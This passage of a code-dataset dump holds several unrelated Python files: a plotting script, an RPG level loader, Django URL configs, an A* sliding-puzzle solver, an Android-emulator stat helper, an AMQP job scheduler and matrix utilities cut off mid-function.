anim = animation.FuncAnimation(fig, animate, init_func=init, frames=200, interval=200, blit=True)\n plt.plot()\n\n\ndef init():\n data[0].set_data([],[])\n data[1].set_data([],[])\n data[2].set_data([],[])\n print(data)\n return data\n\ndef read_data():\n \"\"\"Read and parse the values of the brams of the roach\"\"\"\n \"\"\"Esto esta hecho para leer 64 bits en los brams... 
hay que modificar el modelo\"\"\"\n global fpga\n #A2 = struct.unpack('>16384Q', fpga.read('A2', 16384*8,0)) #me parece que es struct.unpack('>16384', fpga.read('A2', 16384*8,0))\n #B2 = struct.unpack('>16384Q', fpga.read('B2', 16384*8,0))\n #AB_re = struct.unpack('>16384Q', fpga.read('AB_re', 16384*8, 0))\n #AB_im = struct.unpack('>16384Q', fpga.read('AB_im', 16384*8, 0))\n A2 = np.random.rand(1, 16384)\n B2 = np.random.rand(1, 16384)\n AB_re = np.random.rand(1, 16384)\n AB_im = np.random.rand(1, 16384)\n log_a = 10*np.log10(A2)\n log_b = 10*np.log10(B2)\n ang = np.arctan2(AB_im, AB_re)\n return [ang, log_a, log_b]\n\n\ndef animate(i):\n global bw, channels\n print('animate')\n values_read = read_data()\n freq = np.linspace(0, bw, channels, endpoint=False)\n data[0].set_data(freq, values_read[0])\n data[1].set_data(freq, values_read[1])\n data[2].set_data(freq, values_read[2])\n print('animate')\n print(data)\n return data\n","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"97859647","text":"\"\"\" \"Legend of ponomar\" - a rpg\nCopyright (C) 2015 Alex Ponomarev\n\nЭто свободная программа; вы можете повторно распространять ее и/или\nмодифицировать ее в соответствии с Универсальной Общественной Лицензией\nGNU, опубликованной Фондом Свободного ПО; либо версии 2, либо (по вашему\nвыбору) любой более поздней версии.\n\nЭта программа распространяется в надежде, что она будет полезной, но БЕЗ\nКАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемых гарантий КОММЕРЧЕСКОЙ\nЦЕННОСТИ или ПРИГОДНОСТИ ДЛЯ КОНКРЕТНОЙ ЦЕЛИ. Для получения подробных\nсведений смотрите Универсальную Общественную Лицензию GNU.\n\nВы должны были получить копию Универсальной Общественной Лицензии GNU\nвместе с этой программой; если нет, напишите в Free Software Foundation,\nInc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\"\"\"\n\nclass mob:\n health = 100\n \n \n\nclass sword:\n damage = None\n health = None\n image = None \n itype = 'sword'\n name = None\n \n def __init__(self, damage, health, image, name):\n self.damage = damage\n self.health = health\n self.image = image\n self.name = name\n \nclass heal:\n heal = None\n image = None\n itype = 'heal'\n \n def __init__(self, heal, image):\n self.heal = heal \n self.image = image\n\nclass helmet:\n armory = None\n name = None\n itype = \"helmet\"\n image = None\n health = None\n \n def __init__(self, armor, health, image, name):\n self.armory = armor\n self.name = name\n self.image = image\n self.health = health\n \ndef lvl(const):\n if const == 1:\n \n f_r = open('./levels/level_1.txt', 'r')\n lvl1 = [list(line) for line in f_r]\n \n f_r.close()\n \n loot = [[17, 5, sword(20, 50, 0, \"usual sword\")],\n [17, 19, heal(50, 1)]]\n \n return lvl1, 5, 12, loot, (-1, -1), (18, 12), 2, 0\n elif const == 2:\n \n f_r = open('./levels/level_2.txt', 'r')\n lvl2 = []\n \n for i in range(25):\n lvl2.append(list(f_r.readline()))\n \n f_r.close() \n return lvl2, 5, 12, [], (4, 12), (11, 20), 6, 7\n elif const == 3:\n \n f_r = open('./levels/level_3.txt', 'r')\n lvl3 = []\n \n for i in range(25):\n lvl3.append(list(f_r.readline()))\n \n f_r.close() \n \n loot = [[5, 19, helmet(10, 100, 2, \"usual helmet\")]]\n \n return lvl3, 6, 5, loot, (6, 4), (6, 20), 9, 10 \n\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"370690714","text":"from django.conf.urls import patterns, include, url\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'thesite.views.home', name='home'),\n # url(r'^thesite/', include('thesite.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'bootstrap.views.index',name='Home'),\n url(r'^product$', 'bootstrap.views.product',name='Product'),\n url(r'^services$', 'bootstrap.views.services',name='Services'),\n url(r'^contact$', 'bootstrap.views.about',name='Contact'),\n url(r'^about$', 'bootstrap.views.about',name='About'),\n ## django auth\n url(r'^accounts/login/$', 'django.contrib.auth.views.login',name='Login'),\n url(r'^accounts/logout/$', 'django.contrib.auth.views.logout',name='Logout'),\n url(r'^accounts/profile/$', 'bootstrap.views.profile',name='Profile'),\n)\n","sub_path":"thesite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607656468","text":"\"\"\"\nThis sliding-block puzzle solver implements the A-star algorithm to find the shortest list of moves\nresulting in a solved state.\n\"\"\"\n__author__ = \"Jasper Raynolds\"\n__license__ = \"MIT\"\n__date__ = \"February 2018\"\n\nimport heapq\nimport collections\n\n#### BLOCK PUZZLE OBJECT ####\n\nclass Block_Puzzle:\n\tdef __init__(self, blocks):\n\t\t\"\"\"\n\t\tConstructor. Takes a dictionary of integer-tuple pairs that describe block positions.\n\t\tAlternatively, takes a 2D list of integers that is then converted.\n\t\t\"\"\"\n\t\tif type(blocks) is list:\n\t\t\tself.blocks = self._list_to_dict(blocks)\n\t\telse :\n\t\t\tself.blocks = blocks\n\n\t\tself.width = self._get_width()\n\t\tself.height = int(len(self.blocks) / self.width)\n\n\tdef __eq__(self, other):\n\t\t\"\"\"\n\t\tEquals function. Returns whether block dictionaries are equal.\n\t\t\"\"\"\n\t\tif other == None:\n\t\t\treturn False\n\t\treturn self.blocks == other.blocks\n\n\tdef __lt__(self, other):\n\t\t\"\"\"\n\t\tLess-than function. Compares f-scores. If f-scores are equal, compares g-scores.\n\t\t\"\"\"\n\t\tif other == None:\n\t\t\treturn False\n\t\tif fScore[self] == fScore[other]:\n\t\t\treturn gScore[self] < gScore[other]\n\t\treturn fScore[self] < fScore[other]\n\n\tdef __hash__(self):\n\t\t\"\"\"\n\t\tHash function. 
Hashes a frozenset of the blocks.\n\t\t\"\"\"\n\t\treturn hash(frozenset(self.blocks.items()))\n\n\tdef _list_to_dict(self, blockList):\n\t\t\"\"\"\n\t\tConverts a 2D list of integers into a dictionary.\n\t\t\"\"\"\n\t\tdictionary = {}\n\n\t\tfor row in range(len(blockList)):\n\t\t\tfor col in range(len(blockList[0])):\n\t\t\t\tdictionary[blockList[row][col]] = (col, row);\n\n\t\treturn dictionary\n\n\tdef _get_width(self):\n\t\t\"\"\"\n\t\tReturns the width of this puzzle.\n\t\t\"\"\"\n\t\tmaxWidth = 0\n\t\tfor value in self.blocks.values():\n\t\t\tmaxWidth = max(value[0], maxWidth)\n\n\t\treturn maxWidth + 1\n\n\tdef to_string(self):\n\t\t\"\"\"\n\t\tReturns the state in an easy-to-read fashion.\n\t\t\"\"\"\n\t\tarray = []\n\n\t\tfor y in range(self.height):\n\t\t\t# print(\"y:\",y)\n\t\t\trow = []\n\t\t\tfor x in range(self.width):\n\t\t\t\t# print(\"x:\",x)\n\t\t\t\tfor block in self.blocks.items():\n\t\t\t\t\t# print(block)\n\t\t\t\t\tif block[1] == (x,y):\n\t\t\t\t\t\trow.append(block[0])\n\t\t\t\t\t\tbreak\n\t\t\tarray.append(row)\n\n\t\tstring = \"\\n\".join(\"\\t\".join('%i' %x for x in y) for y in array)\n\t\treturn string\n\n\tdef is_solvable(self):\n\t\t\"\"\"\n\t\tReturns true if the board is solvable, false if not.\n\t\tThis algorithmic solution provided by Adam Smith, Ph.D.\n\t\t\"\"\"\n\t\t# Flatten list, remove 0\n\t\tflat = []\n\t\trow0 = 0\n\t\tfor row in range(self.height):\n\t\t\tfor col in range(self.width):\n\t\t\t\tfor key in self.blocks:\n\t\t\t\t\tif self.blocks[key][0] == col and self.blocks[key][1] == row:\n\t\t\t\t\t\tif key == 0:\n\t\t\t\t\t\t\trow0 = row\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tflat.append(key)\n\t\t\t\n\t\t# Count inversions\n\t\tcount = 0\n\t\tfor block in flat:\n\t\t\tfor tile2 in flat:\n\t\t\t\tif flat.index(tile2) < flat.index(block) and tile2 > block:\n\t\t\t\t\tcount += 1\n\n\t\tif self.height % 2 == 0:\n\t\t\tif count % 2 == 0:\n\t\t\t\treturn True\n\t\telif (count + (self.height - row0 - 1)) % 2 == 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef create_solved_puzzle(self):\n\t\t\"\"\"\n\t\tReturns a solved puzzle from this puzzle's dimensions.\n\t\t\"\"\"\n\t\tcellArr = []\n\n\t\tfor row in range(self.height):\n\t\t\tboardRow = []\n\t\t\tfor col in range(self.width):\n\t\t\t\tboardRow.append((row * self.width) + col + 1)\n\t\t\tcellArr.append(boardRow)\n\n\t\tcellArr[self.height - 1][self.width - 1] = 0\n\n\t\tpuzzle = Block_Puzzle(cellArr)\n\t\t\n\t\treturn puzzle\n\n\tdef get_move(self, other):\n\t\t\"\"\"\n\t\tInterprets another puzzle as a move \"U\", \"D\", \"L\" or \"R\" from this one.\n\t\t\"\"\"\n\t\t# Compare both empty spaces\n\t\tthisEmpty = self.blocks[0]\n\t\tthatEmpty = other.blocks[0]\n\t\tmove = (thisEmpty[0] - thatEmpty[0], thisEmpty[1] - thatEmpty[1])\n\n\t\tmoveList = {(0,1): \"D\", (0,-1): \"U\", (1,0): \"R\", (-1,0): \"L\"}\n\t\treturn moveList[move]\n\n\tdef heuristic_estimate_manhattan(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this one.\n\t\tThis heuristic is based on \"manhattan distance.\"\n\t\tReturns the sum of each tile's orthogonal movement to reach its twin on the other board.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\tfor index in range(len(self.blocks)):\n\t\t\testimate += abs(other.blocks[index][0] - self.blocks[index][0]) + abs(other.blocks[index][1] - self.blocks[index][1])\n\n\t\treturn estimate\n\n\tdef heuristic_estimate_misplaced_tiles(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this 
one.\n\t\tThis heuristic is based on \"misplaced tiles.\"\n\t\tReturns the number of tiles, not including the blank, that are in a different location from their twin on the other board.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\tfor index in range(1, len(self.blocks), 1):\n\t\t\tif self.blocks[index] != other.blocks[index]:\n\t\t\t\testimate += 1\n\n\t\treturn estimate\n\n\tdef heuristic_estimate_maxSwap(self, other):\n\t\t\"\"\"\n\t\tFinds the heuristic estimation of the cost to reach another state from this one.\n\t\tThis heuristic is based on \"MaxSwap.\"\n\t\tReturns the number of moves it would take to convert this puzzle to the other if the empty tile could be freely switched.\n\t\t\"\"\"\n\t\testimate = 0\n\n\t\ttempBlocks = dict(self.blocks)\n\n\t\twhile(tempBlocks != other.blocks):\n\t\t\tfor index in range(1, len(self.blocks), 1):\n\t\t\t\tif tempBlocks[index] == other.blocks[index]:\n\t\t\t\t\tcontinue\n\t\t\t\tif tempBlocks[0] == other.blocks[index]:\n\t\t\t\t\ttempBlocks[0] = tempBlocks[index]\n\t\t\t\t\ttempBlocks[index] = other.blocks[index]\n\t\t\t\t\testimate += 1\n\n\t\treturn estimate\n\n\tdef get_neighbors(self, previous):\n\t\t\"\"\"\n\t\tGets all adjacent neighbors of the state, minus the previous.\n\t\tThis function gives 7 neighbors: 4 orthogonal, 4 diagonal, with the previous state trimmed.\n\t\t\"\"\"\n\t\tneighbors = []\n\n\t\tmoves = ((-1,0),(1,0),(0,-1),(0,1))\n\t\tzeroLoc = self.blocks[0]\n\n\t\tfor move in moves:\n\t\t\tnewZeroLoc = (zeroLoc[0] + move[0], zeroLoc[1] + move[1])\n\t\t\t# skip this state if we've moved off the board\n\t\t\tif newZeroLoc[0] < 0 or newZeroLoc[1] < 0 or newZeroLoc[0] > self.width-1 or newZeroLoc[1] > self.height-1:\n\t\t\t\t# print(\"we've moved off the board.\")\n\t\t\t\tcontinue\n\t\t\t# skip this state if it's the same as the previous\n\t\t\tif previous and previous.blocks[0] == newZeroLoc:\n\t\t\t\t# print(\"this is just the same!\")\n\t\t\t\tcontinue\n\n\n\t\t\tnewBlocks = dict(self.blocks)\n\t\t\t# move the 0\n\t\t\tnewBlocks[0] = newZeroLoc\n\n\t\t\t# move whatever's in that location...\n\t\t\t# to the previous one\n\t\t\tfor face, location in newBlocks.items():\n\t\t\t\tif face != 0 and location == newZeroLoc:\n\t\t\t\t\tnewBlocks[face] = zeroLoc\n\n\t\t\tneighbor = Block_Puzzle(newBlocks)\n\t\t\tneighbors.append(neighbor)\n\n\t\treturn neighbors\n\n#### A-STAR ALGORITHM ####\n\ndef aStar(start, goal):\n\t\"\"\"\n\tA star search algorithm. Takes a start state and an end state.\n\tWhile there are available moves, loops through them and exits if the end is found.\n\tReturns the list of states that are the \"quickest\" way to the end.\n\t\"\"\"\n\t# The set of states already evaluated\n\tclosedSet = set()\n\n\t# For each node, which node it can most efficiently be reached from.\n\t# If a node can be reached from many start, cameFrom will eventually contain the\n\t# most efficient previous step.\n\tcameFrom = {}\n\n\t# For each node, the total cost of getting from the start node to the goal\n\t# by passing by that node. 
That value is partly known, partly heuristic.\n\t# This variable is global for the Block_Puzzle object's __lt__ method.\n\tglobal fScore\n\tfScore = collections.defaultdict(lambda: float(\"inf\"))\n\n\t# For each node, the cost of getting from the start node to that node.\n\t# This variable is global for the Block_Puzzle object's __lt__ method.\n\tglobal gScore\n\tgScore = collections.defaultdict(lambda: float(\"inf\"))\n\n\t# The cost of going from start to start is zero.\n\tgScore[start] = 0\n\n\t# The heap of currently discovered state that are not evaluated yet.\n\t# Initially, only the start state is known.\n\topenHeap = [start]\n\theapq.heapify(openHeap)\n\n\t# For the first node, that value is completely heuristic.\n\tfScore[start] = start.heuristic_estimate_manhattan(goal)\n\n\t# The set of neighbors with equal f-scores to their progenitor.\n\t# This set is emptied first to avoid needless push/pop from the heap.\n\tequalSet = set()\n\n\t# While there are yet nodes to inspect,\n\twhile openHeap:\n\t\t# Get the lowest f-score state not yet evaluated.\n\t\tcurrent = heapq.heappop(openHeap)\n\n\t\t# Skip this state if it's a duplicate of one that's already been evaluated.\n\t\tif current in closedSet:\n\t\t\tcontinue\n\n\t\t# If we've reached the goal:\n\t\tif current == goal:\n\t\t\t# return the list of states it took to get there.\n\t\t\tpath = []\n\t\t\tpath.append(current)\n\t\t\tstep = current\n\t\t\twhile(cameFrom.get(step)):\n\t\t\t\tpath.append(cameFrom[step])\n\t\t\t\tstep = cameFrom[step]\n\t\t\tpath.reverse()\n\t\t\treturn path\n\n\t\t# make sure we don't visit this state again.\n\t\tclosedSet.add(current)\n\n\t\t# For each possible neighbor of our current state,\n\t\tfor neighbor in current.get_neighbors(cameFrom.get(current)):\n\t\t\t# Skip it if it's already been evaluated\n\t\t\tif neighbor in closedSet:\n\t\t\t\tcontinue\n\n\t\t\ttentative_gScore = gScore[current] + 1\n\t\t\t# If this path costs less than previous paths here...\n\t\t\tif tentative_gScore < gScore[neighbor]:\n\t\t\t\t# Update the values for this state.\n\t\t\t\tcameFrom[neighbor] = current\n\t\t\t\tgScore[neighbor] = tentative_gScore\n\t\t\t\tfScore[neighbor] = gScore[neighbor] + (1.0001 * neighbor.heuristic_estimate_manhattan(goal))\n\t\t\t\n\t\t\t# Finally, add it to our open heap\n\t\t\theapq.heappush(openHeap, neighbor)\n\n\treturn None\n\n#### SOLVER FUNCTION ####\n\ndef solve(cellArr):\n\t\"\"\"\n\tSolver function. Takes a 2D list of integers, starting from and including 0, in equal-length rows,\n\tand returns a list of single-letter string moves (e.g. 
\"U\", \"R\", \"D\")\n\t\"\"\"\n\t# Error handling\n\tif type(cellArr) is not list or type(cellArr[0]) is not list:\n\t\tprint(\"please pass a 2D integer list to this function.\")\n\t\treturn None\n\trowLength = len(cellArr[0])\n\tfor row in cellArr:\n\t\tif len(row) != rowLength:\n\t\t\tprint(\"all rows in the 2D integer list must be of equal length.\")\n\t\t\treturn None\n\n\t# from the cell list provided, create a Block Puzzle.\n\tpuzzle = Block_Puzzle(cellArr)\n\n\t# is this puzzle solvable?\n\tif not puzzle.is_solvable():\n\t\treturn None\n\n\t# find the solution puzzle for the given puzzle.\n\tgoal = puzzle.create_solved_puzzle()\n\n\t# run A* search algorithm.\n\tpath = aStar(puzzle, goal)\n\n\t# convert into single-letter moves.\n\tmoves = []\n\tfor index in range(len(path)-1):\n\t\tmoves.append(path[index].get_move(path[index+1]))\n\treturn moves\n\n#### TESTING ####\n\n# hard = [[6,5,2,3],\n# \t\t[0,7,11,4],\n# \t\t[9,1,10,8],\n# \t\t[15,14,13,12]]\n# print(solve(hard))\n\n# medium = [[1,2,3,4],\n# \t\t [0,7,11,5],\n# \t\t [9,6,10,8],\n# \t\t [15,14,13,12]]\n# print(solve(medium))\n\n# easy = [[1,2,3,4],\n# \t\t[0,5,6,7],\n# \t\t[9,10,11,8]]\n# print(solve(easy))\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87083667","text":"from django.urls import path, include\nfrom rest_framework.authtoken.views import obtain_auth_token\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView\n\nfrom . import views\n\nurlpatterns = [\n\n path(\"jobseeker/list/\", views.JobSeekerListView.as_view()),\n path(\"jobseeker/detail//\", views.JobSeekerRetrieveUpdateDeleteView.as_view()),\n path(\"jobseeker/create/\", views.JobSeekerCreateView.as_view()),\n\n path(\"vacancy/list/\", views.VacancyListView.as_view()),\n path(\"vacancy/detail//\", views.VacancyRetrieveUpdateDeleteView.as_view()),\n path(\"vacancy/create/\", views.VacancyCreateView.as_view()),\n\n path(\"profession/list/\", views.ProfessionListView.as_view()),\n path(\"profession/detail//\", views.ProfessionRetrieveUpdateDeleteView.as_view()),\n path(\"profession/create/\", views.ProfessionCreateView.as_view()),\n\n path(\"employer/list/\", views.EmployerListView.as_view()),\n path(\"employer/detail/\", views.EmployerRetrieveUpdateDeleteView.as_view()),\n path(\"employer/create/\", views.EmployerCreateView.as_view()),\n\n path(\"experience/list//\", views.ExperienceListView.as_view()),\n path(\"experience/detail/\", views.ExperienceRetrieveUpdateDeleteView.as_view()),\n path(\"experience/create/\", views.ExperienceCreateView.as_view()),\n\n path(\"resume/list/\", views.ResumeListView.as_view()),\n path(\"resume/detail/\", views.ResumeRetrieveUpdateDeleteView.as_view()),\n path(\"resume/create/\", views.ResumeCreateView.as_view()),\n\n path(\"application/list/\", views.ApplicationListView.as_view()),\n path(\"application/detail/\", views.ApplicationRetrieveUpdateDeleteView.as_view()),\n path(\"application/create/\", views.ApplicationCreateView.as_view()),\n\n]\n","sub_path":"students/k3340/laboratory_works/Nurdinov_Rostislav/laboratory_work_4/backend/exchange_engine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"80445201","text":"import json\nimport os\nfrom os import stat_result\n\nfrom unicorn import Uc\n\ndef _get_def_dic():\n return 
{\n 'st_dev': 0,\n '__st_ino': 0,\n 'st_mode': 0,\n 'st_nlink': 0,\n 'st_uid': 0,\n 'st_gid': 0,\n 'st_rdev': 0,\n 'st_size': 0,\n 'st_blksize': 0,\n 'st_blocks': 0,\n 'st_atime': 0,\n 'st_atime_ns': 0,\n 'st_mtime': 0,\n 'st_mtime_ns': 0,\n 'st_ctime': 0,\n 'st_ctime_ns': 0,\n 'st_ino': 0\n }\n#\ndef stat64(path):\n if (path == None):\n return _get_def_dic()\n #\n meta_path = path + '.meta_emu'\n\n if not os.path.exists(meta_path):\n meta_path_dir = os.path.dirname(meta_path)\n\n if not os.path.isdir(meta_path_dir):\n os.makedirs(meta_path_dir)\n\n with open(meta_path, 'w') as f:\n json.dump(_get_def_dic(), fp=f, indent=4)\n #\n #\n \n with open(meta_path, 'r') as f:\n return json.load(fp=f)\n\ndef stat_to_memory2(uc, buf_ptr, stat, uid):\n '''\n unsigned long long st_dev; \n unsigned char __pad0[4]; \n unsigned long __st_ino; \n unsigned int st_mode; \n nlink_t st_nlink; 4\n uid_t st_uid; 4\n gid_t st_gid; 4\n unsigned long long st_rdev; \n unsigned char __pad3[4]; \n long long st_size; \n unsigned long st_blksize; \n unsigned long long st_blocks; \n struct timespec st_atim; 8\n struct timespec st_mtim; 8\n struct timespec st_ctim; 8\n unsigned long long st_ino; \n\n '''\n\n uc.mem_write(buf_ptr, int(stat.st_dev).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 8, int(0).to_bytes(4, byteorder='little')) # PAD 4\n uc.mem_write(buf_ptr + 12, int(stat.st_ino).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 16, int(stat.st_mode).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 20, int(stat.st_nlink).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 24, int(uid).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 28, int(uid).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 32, int(stat.st_rdev).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 40, int(0).to_bytes(4, byteorder='little')) # PAD 4\n uc.mem_write(buf_ptr + 48, int(stat.st_size).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 56, int(stat.st_blksize).to_bytes(4, byteorder='little'))\n uc.mem_write(buf_ptr + 64, int(stat.st_blocks).to_bytes(8, byteorder='little'))\n\n uc.mem_write(buf_ptr + 72, int(stat.st_atime).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 80, int(stat.st_mtime).to_bytes(8, byteorder='little'))\n uc.mem_write(buf_ptr + 88, int(stat.st_ctime).to_bytes(8, byteorder='little'))\n\n uc.mem_write(buf_ptr + 96, int(stat.st_ino).to_bytes(8, byteorder='little'))\n#","sub_path":"androidemu/vfs/file_helpers.py","file_name":"file_helpers.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394641918","text":"\"\"\"\nCreated on 2011-02-07\n\n@author: Bohdan Mushkevych\n\"\"\"\n\nfrom datetime import datetime\nfrom threading import Lock\nfrom amqplib.client_0_8 import AMQPException\n\nfrom flopsy.flopsy import PublishersPool\nfrom system.decorator import with_reconnect\nfrom system.synergy_process import SynergyProcess\nfrom system.collection_context import CollectionContext\nfrom system.collection_context import COLLECTION_SCHEDULER_CONFIGURATION\nfrom system.repeat_timer import RepeatTimer\nfrom system.process_context import *\n\nfrom hadoop_pipeline import HadoopPipeline\nfrom regular_pipeline import RegularPipeline\nfrom model.scheduler_configuration_entry import SchedulerConfigurationEntry\nfrom time_table import TimeTable\n\n\nclass Scheduler(SynergyProcess):\n \"\"\" Scheduler encapsulate logic for starting the aggregators/alerts/other readers 
\"\"\"\n\n def __init__(self, process_name):\n super(Scheduler, self).__init__(process_name)\n self.logger.info('Starting %s' % self.process_name)\n self.publishers = PublishersPool(self.logger)\n self.thread_handlers = dict()\n self.lock = Lock()\n self.timetable = TimeTable(self.logger)\n self.regular_pipeline = RegularPipeline(self, self.timetable)\n self.hadoop_pipeline = HadoopPipeline(self, self.timetable)\n self.logger.info('Started %s' % self.process_name)\n\n\n def __del__(self):\n for handler in self.thread_handlers:\n handler.cancel()\n self.thread_handlers.clear()\n super(Scheduler, self).__del__()\n\n\n def _log_message(self, level, process_name, time_record, msg):\n \"\"\" method performs logging into log file and TimeTable node\"\"\"\n self.timetable.add_log_entry(process_name, time_record, datetime.utcnow(), msg)\n self.logger.log(level, msg)\n\n\n # **************** Scheduler Methods ************************\n @with_reconnect\n def start(self):\n \"\"\" reading scheduler configurations and starting timers to trigger events \"\"\"\n collection = CollectionContext.get_collection(self.logger, COLLECTION_SCHEDULER_CONFIGURATION)\n cursor = collection.find({})\n if cursor.count() == 0:\n raise LookupError('MongoDB has no scheduler configuration entries')\n\n for entry in cursor:\n document = SchedulerConfigurationEntry(entry)\n interval = document.get_interval()\n is_active = document.get_process_state() == SchedulerConfigurationEntry.STATE_ON\n type = ProcessContext.get_type(document.get_process_name())\n parameters = [document.get_process_name(), document]\n\n if type == TYPE_ALERT:\n function = self.fire_alert\n elif type == TYPE_HORIZONTAL_AGGREGATOR:\n function = self.fire_worker\n elif type == TYPE_VERTICAL_AGGREGATOR:\n function = self.fire_worker\n elif type == TYPE_GARBAGE_COLLECTOR:\n function = self.fire_garbage_collector\n else:\n self.logger.error('Can not start scheduler for %s since it has no processing function' % type)\n continue\n\n handler = RepeatTimer(interval, function, args=parameters)\n self.thread_handlers[document.get_process_name()] = handler\n\n if is_active:\n handler.start()\n self.logger.info('Started scheduler for %s:%s, triggering every %d seconds'\\\n % (type, document.get_process_name(), interval))\n else:\n self.logger.info('Handler for %s:%s registered in Scheduler. 
Idle until activated.'\\\n % (type, document.get_process_name()))\n\n # as Scheduler is now initialized and running - we can safely start its MX\n self.start_mx()\n\n\n def start_mx(self):\n \"\"\" method's only purpose: import MX module (which has back-reference import to scheduler) and start it \"\"\"\n from mx.mx import MX\n self.mx = MX(self)\n self.mx.start_mx_thread()\n\n\n def fire_worker(self, *args):\n \"\"\"requests vertical aggregator (hourly site, daily variant, etc) to start up\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n time_record = self.timetable.get_next_timetable_record(process_name)\n time_qualifier = ProcessContext.get_time_qualifier(process_name)\n\n if time_qualifier == ProcessContext.QUALIFIER_HOURLY:\n self.regular_pipeline.manage_pipeline_for_process(process_name, time_record)\n else:\n self.hadoop_pipeline.manage_pipeline_for_process(process_name, time_record)\n\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('Exception: %s' % str(e), exc_info=True)\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\n def fire_alert(self, *args):\n \"\"\" Triggers AlertWorker. Makes sure its trees have\n finalized corresponding timeperiods prior to that\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n\n time_record = self.timetable.get_next_timetable_record(process_name)\n self.hadoop_pipeline.manage_pipeline_with_blocking_dependencies(process_name, time_record)\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('Exception: %s' % str(e), exc_info=True)\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\n def fire_garbage_collector(self, *args):\n \"\"\"fires garbage collector to re-run all invalid records\"\"\"\n try:\n process_name = args[0]\n self.lock.acquire()\n self.logger.info('%s {' % process_name)\n\n self.publishers.get_publisher(process_name).publish({})\n self.logger.info('Publishing trigger for garbage_collector')\n self.timetable.build_tree()\n self.timetable.validate()\n self.logger.info('Validated Timetable for all trees')\n except (AMQPException, IOError) as e:\n self.logger.error('AMQPException: %s' % str(e), exc_info=True)\n self.publishers.reset_all_publishers(suppress_logging=True)\n except Exception as e:\n self.logger.error('fire_garbage_collector: %s' % str(e))\n finally:\n self.logger.info('}')\n self.lock.release()\n\n\nif __name__ == '__main__':\n from system.process_context import PROCESS_SCHEDULER\n\n source = Scheduler(PROCESS_SCHEDULER)\n source.start()","sub_path":"scheduler/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"327053371","text":"from math import sqrt\n\n\ndef matrix_mult(a, b):\n \"\"\"\n Function that multiplies two matrices a and b\n\n Parameters\n ----------\n a,b : matrices\n\n Returns\n -------\n new_array : matrix\n The matrix product of the inputs\n \"\"\"\n new_array = []\n for i in range(len(a)):\n new_array.append([0 for i in range(len(b[0]))])\n for j in range(len(b[0])):\n for k in range(len(a[0])):\n new_array[i][j] += a[i][k] * 
b[k][j]\n\n return new_array\n\n\ndef matrix_vector_mult(matrix, vector):\n new_vector = []\n for row in range(len(matrix)):\n new_vector.append(0)\n for column in range(len(matrix[row])):\n new_vector[row] += matrix[row][column] * vector[column]\n\n return new_vector\n\n\ndef print_matrix(matrix):\n for row in matrix:\n for val in row:\n print('{:4}'.format(val), end=\" \")\n print()\n\n print()\n\n\ndef vector_inf_norm(vector):\n maximum = abs(vector[0])\n for i in range(1, len(vector)):\n if abs(vector[i]) > maximum:\n maximum = abs(vector[i])\n\n return maximum\n\n\ndef sub_vector(vector1, vector2):\n new_vector = []\n for i in range(len(vector1)):\n new_vector.append(vector1[i] - vector2[i])\n return new_vector\n\n\ndef vector_mult(vector1, vector2):\n new_matrix = []\n for i in range(len(vector1)):\n new_matrix.append([0 for i in range(len(vector2))])\n for j in range(len(vector2)):\n new_matrix[i][j] = vector1[i]*vector2[j]\n return new_matrix\n\n\ndef transpose(matrix):\n transposed_matrix = []\n [transposed_matrix.append([0.0 for i in range(len(matrix))]) for j in range(len(matrix[0]))]\n for column_index in 